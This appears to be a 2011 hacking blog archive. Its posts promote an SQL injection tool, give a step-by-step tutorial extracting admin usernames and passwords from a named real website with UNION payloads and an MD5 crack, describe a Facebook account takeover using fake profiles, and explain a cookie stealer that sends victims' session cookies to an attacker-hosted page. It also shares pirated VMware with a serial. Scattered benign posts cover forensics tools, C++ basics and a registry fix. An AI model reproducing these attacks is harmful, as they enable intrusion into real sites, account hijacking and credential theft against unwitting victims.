iMasterhack: May 2011

Saturday, 28 May 2011

SQL injection Hack tool for hacking websites and database

Introduction:

Safe3SI is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting

SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the

ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database,

to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Screenshot:

Features:

Full support for http, https website.
Full support for Basic, Digest, NTLM http authentications.
Full support for GET, Post, Cookie sql injection.
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
Powerful AI engine to automatic recognite injection type, database type, sql injection best way.
Support to enumerate databases, tables, columns and data.
Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
Support to ip domain query,web path guess,md5 crack etc.
Support for sql injection scan.

Download:

Safe3SI need to download and install:

.NET Framework 2.0 or above needed to install

Safe3SI v8.2

SQL Injection tutorial to Hack websites | Hacking websites

we have already discussed about SQL Injections method of hacking websites . Some of my website users reported that those articles are little bit difficult to understand for new users who wish to learn hacking. For the sake of new users who wish to learn website hacking and SQL injection, i am writing this article at such a basic level that the user who didn't even have any prior knowledge of SQL can start SQL Injecting websites. This article is also beneficial for hackers too as it will refresh their concepts that what really we have to do and look into website URL if we want to hack website or its database using SQL injection. So Guys read on very basic SQL injection tutorial...

SQL injection tutorial to hack websites | Hacking website databse

What is SQL Injection?

Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say Adnan and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:

1. You need a web browser to open URL and viewing source codes.

2. Need a good editor like Notepad ++ to view the source codes in colored format so that you can easily distinguish between the things.

3. And very basic knowledge of some SQL queries like SELECT, INSERT, UPDATE, DELETE etc..

What you should look into website to detect is it vulnerable to SQL injection attack or not?

First of all you can hack those websites using SQL injection hacks that allows some input fields from which can provide input to website like log in page, search page, feedback page etc. Nowadays, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

< F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>

Everything between the < f o r m > and < / f o r m > parameters (remove spaces in words) contains the crucial information and can help us to determine things in more detailed way.

There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:

http://example.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:

Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--

You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:

< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

If your luck is favoring you, you will get the login into the website without any username or password.

But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports

In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.

SELECT * FROM TABLE-NAME WHERE category='sports'

Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:

http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'

The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

How to protect you own websites from SQL injection?

Filter out character like ' " - / \ ; NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie

That's all for today,

I hope it really helped you to clear your basics about website hacking or website database hacking using SQL injection.

If you have any queries ask me in form of comments...

Top 5 Hack Tools for Hackers to Investigate Computer System

Hello Friends, today i will share with you top 5 hack tools for hackers to Investigate or Forensic their computer system or PC. Have you ever felt that your system is compromised or shared ? Do you think your system has unusual softwares or packages installed on it that sends your confidential or secret personal data to other Hackers? Always fears to test any hack tool that it contains viruses or malware or not? Wanna investigate your network that which application is sending which data to whom or where?
If any of the question fits you then this post is for you. But if i speak by heart these tools are must for every normal users and hackers too to investigate their systems from boot to close. Today i am making you a real ethical hacker as today i will teach you how to investigate your system. And how to get rid of noobish antiviruses that do simply nothing on your PC just consumes resources of your system.

List of top 5 hack tools for hackers to Inverstigate or Forensic Computer system or PC:
1. Live View
2. Start up List
3. Open Files View
4. Wireshark
5. Helix 3

Working of above tools stepwise:
1. Live View
Live View is an open source utility that creates a virtual machine of the existing system. Live View creates a virtual disk out of the system that allows you to then safely investigate a copy of the system without interfering with anything installed. So you can easily investigate your system virtually without affecting the original system.
Now restart you PC for further investigations and tools to use.
You can download Live View for free here (Click here to download).

2. Start up List
Now you have a virtual copy of your system and now why you are waiting let's start investigating PC. So download the Start Up List (click here to download startup list).This is a great way to start the investigation of a system and determine what things might have potentially been put on the system to restart each time the system does. It will provide you the list of all programs that system use during the boot time. Great way to find the key-loggers and other remote monitoring tools as they are always added to start up.
Now why i am saying this tool as you can directly do it using MSCONFIG command. Answer is as simple as question, msconfig only displays the list of programs that are attached to start up using registry keys. Normally what happens the viruses attach themself to some of the existing windows service so it will become difficult to identify its instances. Start up list displays all the back ground programs too.

3. Open Files View
The next step in investigating your computer is to find or determine which other files, other than usual are open. In Linux we can directly do this using the ISOF command in the terminal but there is no similar command in windows. Ahhah now what will you do to investigate this.. Don't worry OpenFilesView is there(click here to download openfileview). Openfilesview is a Windows executable that lists all the files and processes that are active currently – both local and network based – on the system. So you can easily identify which unusual file is opened or which unusual process is running. Now how it helps, all key-loggers or remote administration tools always maintains a temporary file on which they write their logs or other details. Now nothing is hidden from you. You can see each and everything and find out easily that which noob virus or keylogger is running on your system.

4. Wireshark
Mine favorite tool out of 5 tools. Now you have researched your system using above there tools, it time to investigate your network traffic. Several times it happens, when you install some software you doubt that it is sending your personal data or information to someone else. Wireshark is a tool that monitors your network packets and analyze them where its sending data. Now how its helpful for you, Most Trojans and key-loggers sends logs using network and upload them to FTP or send them to some email address. Using wireshark you can monitor what they are sending and even the username and password of FTP and email accounts on which it is sending. This is the most promising factor that makes to love wireshark more. So why waiting download the wireshark for free: (Click here to download Wireshark).

5. Helix 3
Now you all will be thinks we have done everything, investigating is done.but i am Destructive Mind. So few more things are striking my mind. What more i can investigate in the PC. Any guesses...
Damn.. i forgot i was teaching you..
Now how will you determine what the noob viruses has changed in your system, which files they have edited or attached their signatures to which of the programs and most important what they have edited or added. This you can do with the help of Helix 3. Helix 3, a newly updated version of the live Linux forensics tool, can be used to examine the disk safely to see what has been finally changed. So guys now how classy you think you have become. But sorry to inform you that its the first part of hacker's life and i guarantee 99.99% guys doesn't know these tools. Ahhh... If they know about these tools then they surely doesn't know how to use them and more important if they know that also they probably never used them as they are LAZY enough and leave everything on noob antiviruses.
(Click here to download helix3) Its a 30 day trial version guys, as licensed version is for one system only. But i can tell you some awesome tricks to use it as much as you want. For downloading evaluation version again and again just register with new email ID and remove the previous version using WinXP manager which removes registry keys also.

One more suggestion about these noob antiviruses, they detect only those viruses and Trojans that are in their database, if a new virus has come then you have to wait till next database upgrade for getting it detected.

Tuesday, 24 May 2011

SQL Injection | Step by Step deface website

What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format
www.anything.com/something.php?something=something, example
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.

We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases.

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.

SQL Injection Tutorial :-
This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from
information_schema.tables where table_schema=database()-- Click here
We got first table name on the screen.

To get all tables use group_concat

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()-- Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns.

Step 6.Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).

Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes can not be cracked.
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.

So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms.

Kindly mention your queries in comments. The same thing we did can be done easily using automated tools.I will write that in next post. But avoid tools,if you really want to learn new.

Monday, 23 May 2011

Sony hacked twice in one day, this time $1225 was stolen from accounts in Japan

Sony just can’t seem to catch any breaks online. Just when it seems the PlayStation Network is finally back online with the PlayStation Store to follow on May 24, various sources are reporting two new cyber attacks on Sony websites today.
F-Secure Security Lab first discovered that a phishing site was hiding on the Sony Thailand homepage and stored on a Sony server this moring. It seems the malicious site was posing as an Italian credit card company CartaSi to try to collect personal data from unsuspecting users. (For more on phishing, check out the Wikipedia entry.) According to the F-Secure blog, “Basically this means that Sony has been hacked, again. Although in this case the server is probably not very important.”
The second attack unfortunately caused more damage. According to Reuters, So-Net, the Internet provider of Sony Japan, “alerted customers that an intruder broke into its system and stole virtual points from account holders worth $1,225.”
So how should Sony Japan and So-Net customers protect themselves from becoming the next victim?
“What we’ve done is stopped the So-Net points exchanges and told customers to change their passwords,” So-Net said in a statement to customers on its website in Japanese.
Without a doubt, Sony needs to better secure all its online properties (not just the PlayStation Network) quickly because the hackers are making a mockery of its seemingly wafer-thin defense system. This fiasco is quickly spiraling out of control.
[Source: F-Secure Blog via Ars Technica; Reuters via Chicago Tribune]

Download BackTrack 5

How to download BackTrack 5

Download BackTrack 5 directly

Download BackTrack 5 from Mirror - Download BackTrack 5 Torrent

Name:     BT5-KDE-32.torrent

Size:           1840

Flavor:        KDE

Arch:    32 bit

Image:       ISO

Download BackTrack 5 KDE-32Bit From Here :     Torrent

MD5:     4150643026d292717f77ebb83948a034

=================

Name:    BT5-KDE-64.torrent

Size:            1800

Flavor:         KDE

Arch:           64 bit

Image:         ISO

Download BackTrack 5 KDE-64Bit From here :    Torrent

MD5:    80d65610de90ac7ede49b9f7935dfdd2

==================

Name:     BT5-GNOME-32.torrent

Size:                  1910

Flavor:              GNOME

Arch:                 32 bit

Image:       ISO

Download BackTrack 5 Gnome-32Bit From Here :       Torrent

MD5:                 b01a93a916fabb6d1640bd0054428e17

============================================

Name:    BT5-GNOME-64.torrent

Size:                1870

Flavor:            GNOME

Arch:               64 bit

Image:       ISO

Download BackTrack 5 Gnome-64Bit From Here:     Torrent

MD5:                75c4e7a969abc873d9e085656b156345

VMware Workstation v7.1.3-32 + serial

VMware Workstation v7.1.3-32 + serial | 560.35 MB

rom the creator of PC virtualization comes the most reliable, secure way to run multiple operating systems at the same time. Winner of more than 50 industry awards, VMware Workstation transforms the way technical professionals develop, test, demo, and deploy software. VMware Workstation is an integral component of any serious technical professional's toolkit.
Get Maximum Performance for Windows 7
VMware Workstation 7 is optimized for maximum performance when running on 32-bit and 64-bit Windows 7 PCs. Supports Flip 3D and Aero Peek to show live thumbnails of your virtual machines. Run legacy application with 3D graphics, faster performance, and tighter desktop integration better than Windows XP Mode. Get shared folders and drag and drop convenience.
Gain an Indispensable Tool
Automate and streamline tasks to save time and improve productivity. Run applications in Linux, Windows, and more at the same time on the same PC with no rebooting. Evaluate and test new operating systems, applications and patches in an isolated environment. Demonstrate complex software applications on a single laptop in a repeatable, reliable manner. Rich integration with Visual Studio, Eclipse, and the SpringSource Tool Suite make it incredibly easy to debug applications on multiple platforms.
Run Your Most Demanding Applications on the Most Advanced Virtualization Platform
Create virtual machines with up to 8 virtual processors or 8 virtual cores, 2 TB virtual disks and up to 32 GB of memory per virtual machine to run the most demanding applications. Protect your virtual machines from prying eyes with 256-bit AES encryption and smart card authentication.

Download :

http://www.filesonic.com/file/928338071/VMware.Workstation.v7.1.3-32.serial.part1.rar
http://www.filesonic.com/file/928380384/VMware.Workstation.v7.1.3-32.serial.part2.rar

How to Hack Facebook Passwords by adding into friend list

How to Hack Facebook Password: Facebook Password Hacker

Hacking Facebook Passwords

How to Hack Facebook Passwords by adding into friend list

These days many Facebook users have hundreds and possibly thousands of friends. More friends increase the chance that your Facebook account will be hacked – especially if you accept friend requests from people you do not know.

Critical vulnerability found on FACEBOOK

It isn’t entirely unusual that Facebook users receive friend requests from people they do not know. Often, those friend requests are blindly accepted in an effort to grow the friendship base. It seems that especially people with Facebook accounts that are primarily used for marketing purposes are more likely to accept friend requests from people they do not know than the typical Facebook user does.

Such accounts could be hacked easily, and there is no ingenious hacking talent required to do so: You simply need to walk through Facebook’s passwork recovery process with two other Facebook friends of a targeted account.

You can easily gain access to a your friends Facebook account through a collusion approach. You have to use Facebook’s password recovery feature, which is accessible through the “Forgot your password?” link on the Facebook login page.

Once identified the Friend, Facebook suggested to recover the password via the existing email address. However, you can bypass this hurdle by clicking the “No longer have access to these?” link. In that case, Facebook asks for a new email address. In the following step, Facebook presents the security question tied to the account. However, you can also to bypass the question by typing wrong answers three times in a row. After that, Facebook provides a rather surprising way to get your account back – via the support of three friends.

1. First, you select three friends “you trust”. These three friends then receive a code, which is required to change the account password.

2. Select yourself and immediately received a code from Facebook. With those three codes, you can easily change the password for the targeted account.

3. The problem clearly is that three friends you do not really know and cannot trust could potentially gain access to the victim Facebook account – through the standard password recovery feature.

4. To bypass problem mentioned in step 3 SOCIAL ENGINEERING. Create your own 2 more fake profiles and add the victim as a friend on facebook. Now get all the 3 codes and you are done.

NOTE: The targeted account will be locked for 24 hours after this password change and the user’s old email address receives a notification of the password change as well as the names of the three friends who were given the codes. However, if these are friends with fake names, it doesn’t quite matter that you now know their names.

Now if a Facebook user could in fact be in a situation when a Facebook account is not checked within a 24-hour period, particularly since we enjoy to flaunt our activities through Facebook status messages. And if the account is checked frequently, the account depends on Facebook’s response time, which can easily stretch to a number of days.

Bottom line is You don’t expose yourself to people you don’t know.

Introduction to C++

Overview

A computer is a machine that receives instructions and produces a result after performing an appropriate assignment. Since it is a machine, it expects good and precise directives in order to do something. The end result depends on various factors ranging from the particular capabilities of the machine, the instructions it received, and the expected result.

As a machine, the computer cannot figure out what you want. The computer doesn't think and therefore doesn't make mistakes.
Computer programming is the art of writing instructions (programs) that ask the computer to do something and give a result. A computer receives instructions in many different forms, four of which are particularly important.

The first instructions are given by the manufacturers of various hardware parts such as the microprocessor, the motherboard, the floppy and the CD-ROM drives, etc. These parts are usually made by different companies, setting different and various goals that their particular part can perform. The instructions given to the microprocessor, for example, tell it how to perform calculations, at what speed, and under which circumstances. The instructions given to the motherboard tell it to behave like a city where people and cars can move from one part of the town to another, back and forth, for various reasons; this allows information to flow from one part of the city, I mean one section of the computer, to another.

Once the instructions given to the hardware parts are known, software engineers use that information to give the second sets of instructions to the computer. These instructions, known as an operating system, are usually written by one company. These second instructions tell the computer how to coordinate its different components so the result will be a combination of different effects. This time, the computer is instructed about where the pieces of information it receives are coming from, what to do with them, then where to send the result. This time also the operating system designers impose a lot of behaviors to the computer as a machine. Again this time, some computer languages are developed so that programmers can write applications as the third set of instructions. It is like developing languages that people in a city can use to talk to each other. Consider that from now on (once the OS is developed), people get into the habit of doing things according to their particular culture or taste, speaking different languages that their neighbor doesn't understand... Luckily, the computer, I should say the OS, understands all these languages (I can't guaranty that). Some of the operating systems on the market are: Microsoft Windows 3.X, Corel Linux, IBM OS\2, Microsoft Windows 9X, Apple OS 10, Red Hat Linux, Microsoft Windows Millennium, BeOS, Caldera Linux, Microsoft Windows 2000 etc. A particular OS (for example Microsoft Windows 98) depending on a particular processor (for example Intel Pentium) is sometimes referred to as a platform. Some of the computer languages running on Microsoft Windows operating systems are C++, Pascal, Basic, and their variants.

The actual third set of instructions are given to the computer by you, the programmer, using one or more of the languages that the operating system you are planning to use can understand. Your job is going to consist of writing applications. As a programmer, you write statements such as telling the computer, actually the operating system, that "If the user clicks this, do the following, but if he clicks that, do something else. If the user right clicks, display this; if he double-clicks that, do that." To write these instructions, called programs, you first learn to "speak" one of the languages of the OS. Then, you become more creative... Some of the application programs in the market are Microsoft Word, Lotus ScreenCam, Adobe Acrobat, Jasc Paint Shop Pro, etc.

The last instructions are given by whoever uses your program, or your application. For example, if you had programmed Microsoft Word, you would have told the computer that "If a user clicks the New button on the Standard toolbar, I want you to display a new empty document. But if the user clicks File -> New..., I want you to 'call' the New dialog and provide more options to create a new document. If the same user right-clicks on any button on any of the toolbars, I want you to show, from a popup menu, all the toolbars available so she can choose which one she wants. But if she right-clicks on the main document, here is another menu I want you to display."

At this time, you have probably realized that the users of your programs depend on your techniques as a developer to provide an easy to use application (that's what recruiters and employers call experience and creativity). You depend on the computer language that you are actually using (every computer language has its ups and downs). Your computer language depends on the operating system it is running on (different

operating systems have different strengths and weaknesses). The operating system depends on the microprocessor or the machine it is running in (the biggest difference between two microprocessors is the speeds at which each processes information).

Your interest here is on the computer languages, since you are going to write programs. There are various computer languages, for different reasons, capable of doing different things. Fortunately, the computer can distinguish between different languages and perform accordingly. These instructions are given by the programmer who is using compilers, interpreters, etc, to write programs. Examples of those languages are Basic, C++, Pascal, etc

Hack email accounts or passwords using session cookies

Hi friends, welcome back today i will explain you how to hack email accounts and passwords of almost each and every website using session cookies. In my previous article i have explained you about session hijacking. Today i will show you the practical implementation of session hijacking that how can we take over others sessions and hack his email accounts and other website passwords. In this tutorial of hacking email accounts using session cookies, i will explain you with the help of yahoo account. I will tell you how to hack yahoo account using session cookies.

What are Session Cookies or Magic Cookie or Session ID?

Lets discuss this in very simple language, Whenever we login in our account, it generates a unique string that contains the path of automatic login for particular time then after that limited time it expires by itself.
Note its life is only up to when your web browser is open. If you close your web browser it will be get deleted(Its latest up gradation in cookie's field for providing more security).
Now this unique string or simply called Magic cookie is stored at two places first copy is stored on server(of which we cannot do anything) and second is stored in our web browser in form of cookie.
This cookie is destroyed by three ways first is when you close your web browser, second is when you sign out of your account and third is if you left your account open for more than 20 minutes idle.

How to access the cookies on local system?

As i am explaining this tutorial for hacking yahoo email account. So in your web browser just open yahoo.com and login into your account.
After that type the below code exactly and then press enter:

javascript:alert(document.cookie);

Now a popup box will appear showing the cookies something like this:

Now create one fake account on yahoo.com and login in that account and retrieve the cookie in same manner and notice the changes in session ID's.

For hacking the session cookies we first need the session cookies of the victim and its quite simple to get the session cookies of the victim. You just need to send him one link as soon as he clicks on that we will get his session cookie.

After hacking the session cookies, we can use stolen session cookie to login into victim's account even without providing username and password as i already explained that session hacking removes the authentication on the server as we have the AUTO LOGIN cookie. In this type of attack when victim sign out , then hacker will also sign out. But in case of YAHOO its little bit different, when victim signout but attacker still have the access to his account. Yahoo maintains the session for 24 hours and then destroy the session ID's from its server.

How to Steal the Session Cookies?

1. Go to the Website and register there:

http://www.my3gb.com/register.jsp

2. Download the Cookie stealer files:

http://www.megaupload.com/?d=R1802HIE

3. Now upload the four files on the website and create one empty directory naming Cookies as shown below:

hack session cookies using cookie stealer

4. Now Send the link of yahoo.php to victim. Now what will happen when user clicks on the yahoo.php is that its cookies are get stored into directory Cookies and simultaneously he is redirected to his account.

5. Now open the link Hacked.PHP to access the cookies. In my files the password is "explore". You need to put that to access the files.

6. You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

In my next article, I will explain you how to decode the cookies. In this tutorial you will get the cookies only which are in encypted form. You will be able to login but you will not know what information it contains

How to hack online Sessions : Session Hijacking

Hello friends, from now onwards we will explore the most advanced Hacking Techniques. One of them is Session Hijacking. In today's tutorial we will discuss How to hack the online sessions using Session Hijacking. In today's Hacking class, i will explain basics of Session Hijacking like What is session Hijacking and Different types of Session Hijacking attacks and different methods to Hijack the sessions. In my next tutorial that is tomorrow i will explain you in Detail How to Hijack the Sessions and what tools you will need to Hijack the active sessions. So friends read on...

How Session Hijacking works

What is Session Hijacking?

Let's discuss them in common term's, Session Hijacking by the name only it suggests that we are hacking someone's active session and trying to exploit it by taking the unauthorized access over their computer system or Network. So Session Hijacking is the exploitation of valid computer or network session. Sometimes technical guys also call this HTTP cookie theft or more correctly Magic Cookie Hack. Now you guys surely be thinking what is Magic Cookie.
Magic cookie is simply a cookie that is used to authenticate the user on remote server or simply computer. In general, cookies are used to maintain the sessions on the websites and store the remote address of the website. So in Session Hijacking what Hacker does is that he tries to steal the Magic cookies of the active session that's why its called HTTP cookie Theft. Nowadays several websites has started using HTTPS cookies simply called encrypted cookies. But we all know If encrypter exits so its decrypter also :P..

Session Hijacking is the process of taking over a existing active session. One of the main reason for Hijacking the session is to bypass the authentication process and gain the access to the machine. Since the session is already active so there is no need of re-authenticating and the hacker can easily access the resources and sensitive information like passwords, bank details and much more.

Different Types of Session Hijacking

Session Hijacking involves two types of attacks :
1. Active attack
2. Passive attack

In Passive attack, the hacker Hijacks a session, but just sits back and watches and records all the traffic that is being sent from the computer or received by the computer. This is useful for finding the sensitive information like username passwords of websites, windows and much more...

In Active attack, hacker finds the active session and takes over it. This is done by forcing one of the parties offline which is usually achieved by DDOS attack (Distributed Denial of service attack) . Now the hacker takes control over the active session and executes the commands on the system that either give him the sensitive information such as passwords or allow him to login at later time.
There are also some hybrid attacks, where the attacker watches a session for while and then becomes active by taking it over. Another way is to watch the session and periodically inject data into the active session without actually taking it over.

Methods to Hijack Sessions

There are four main methods used to perpetrate a session hijack. These are:

Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

That's all for today later we will discuss in detail How to do the Session Hijacking practically.
I hope you all like this...
If you have any queries ask me in form of comments...

How to Enable Registry disabled by Administrator

Hello friends, today i will explain you the solution of very common problem that usually users face i.e whenever you try to open registry editor you get an error message "Registry has been disabled by Your Administrator". It's a very common problem and its solution is also quite simple if you know playing with registry. My main motive is not to provide or directly feed you the solution. I want that you should explore the things. So Let's explore the registry...

Enable registry disabled by admiistrator or admin

Enable Registry Disabled by Administrator

What is Registry?

The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. It contains settings for low-level operating system components as well as the applications running on the platform: the kernel, device drivers, services, SAM, user interface and third party applications all make use of the registry. The registry also provides a means to access counters for profiling system performance.

I know most of you know that registry is called the "BRAIN OF WINDOWS" which store all the information in form of registry keys or technically we call them DWORD or STRING or BINARY or MULTI-STRING values which stores the data into the data in the form the name suggests.

How to enable the Registry disabled by Administrator?

The following message usually displayed when your system is infected by some virus that changes the registry value and hence you get an error message displaying " Registry is disable by Admin". So to fix it you also have to edit the registry but since your registry has been disabled so you cannot directly access it. For this you need to create one registry file that will update the dword value into the registry database.

Steps to enable registry:

1. Open the Notepad.

2. Copy the below code and paste into the notepad.

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

3. Now save the Notepad file as "anything.reg"(without quotes) and remember to select the file type as all files while saving otherwise you will not been able to execute it.

4. Now Close the file and open by double click on file and then click ok.

How to Do it using GPEDIT.MSC

Just follow this:
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Disabled

That's all the simple hack to Enable the Registry disabled by Administrator. Isn't that simple...

Your Way to grsec/PaX Bypass-stackjacking

Technique to exploit grsecurity/PaX-hardened Linux kernels. Read on for a brief overview of our presentation and a link to the full slides and PoC code.
By (Dan Rosenberg and jon oberheide)

The Stackjacking Technique

In our slides, we presented a technique to exploit a grsecurity/PaX-hardened Linux kernel (eg. GRKERNSEC_HIGH) given the existence of two exploitation primitives:

an arbitrary kernel write; and
a kernel stack memory disclosure

To be clear, this attack vector is completely unnecessary when exploiting a vanilla Linux kernel, since an arbitrary write is more than sufficient to get root, given the vast amount of useful targeting information Linux gives out via /proc, etc. Likewise, the kernel stack memory disclosure is also unnecessary on vanilla, since there are much easier ways of getting this information. However, due to GRKERNSEC_HIDESYM (which aims to remove all known sources of info leakage), PAX_KERNEXEC (which makes global data structures with known locations read-only), and other mitigation features of grsecurity/PaX, effective exploitation is orders of magnitude harder than a vanilla kernel and took a few interesting twists.
Our technique can be broken down into three distinct stages:

Stack self-discovery: We observed that kernel stack memory disclosures can leak sensitive addresses to userspace. In particular, if we can leak a pointer TO the kernel stack that resides ON the kernel stack, we can calculate the base of our own process’ kernel stack: kstack_base = leaked_addr & ~(THREAD_SIZE-1). We call this technique stack self-discovery.
